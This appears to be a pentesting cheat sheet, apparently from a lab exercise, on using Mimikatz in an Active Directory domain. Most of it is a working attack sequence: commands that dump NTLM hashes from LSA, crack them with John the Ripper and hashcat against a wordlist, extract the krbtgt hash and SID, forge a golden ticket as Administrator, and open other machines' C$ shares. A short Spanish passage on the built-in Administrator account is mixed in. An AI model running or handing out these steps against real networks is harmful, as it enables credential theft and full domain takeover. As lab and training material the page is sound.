Mimikatz

Mimikatz is a very popular and powerful post-exploitation tool mainly used for dumping user credentials inside of a active directory network.

The idea is take that credentials (hashes) and try to crack them.

Run mimikatz

.\mimikatz.exe

Run mimikatz as Administrator

Inside mimikatz interaction, we run:

privilege::debug

Extract NTLM hashes

lsadump::lsa /patch

Crack NTLM hashes

 cat mimikatz-ntlm.hashes 
Administrator:2777b7fec870e04dda00cd7260f7bee6
krbtgt:5508500012cc005cf7082a9a89ebdfdf
[...]

Identify hash type

 haiti '2777b7fec870e04dda00cd7260f7bee6'
NTLM [HC: 1000] [JtR: nt]

John the Ripper

john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT mimikatz-ntlm.hashes

Hashcat

hashcat -a 0 -m 1000 mimikatz-ntlm.hashes /usr/share/wordlists/rockyou.txt --username --show -o cracked-mimikatz-ntlm.hashes
  • --username: To specify to hashcat that our hash file contains usernames or emails.

  • --show: To save the output like USER:HASH:PLAIN

Golden ticket attack

Extract info about krbtgt (Kerberos Ticket Granting Ticket account)

We will first dump the hash and sid of the krbtgt user then create a golden ticket and use that golden ticket to open up a new command prompt allowing us to access any machine on the network.

lsadump::lsa /inject /name:krbtgt

This dumps the hash and security identifier of the Kerberos Ticket Granting Ticket account allowing you to create a golden ticket.

Generating ticket

kerberos::golden /user: /domain: /sid: /krbtgt: /id:
kerberos::golden /user:Administrator /domain:CONTROLLER.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500

/id:500 =

S-1-5-domain-500

Administrator

Cuenta de usuario para el administrador del sistema. Cada equipo tiene una cuenta de administrador local y cada dominio tiene una cuenta de administrador de dominio. La cuenta de administrador es la primera cuenta creada durante la instalación del sistema operativo. La cuenta no se puede eliminar, deshabilitar ni bloquear, pero se puede cambiar el nombre. De forma predeterminada, la cuenta de administrador es miembro del grupo Administradores y no se puede quitar de ese grupo.

Accessing to machines

To enable complete privileges over all the machines:

misc::cmd

And then we have access:

dir \\Desktop-1\c$
dir \\Machine2\c$

Last updated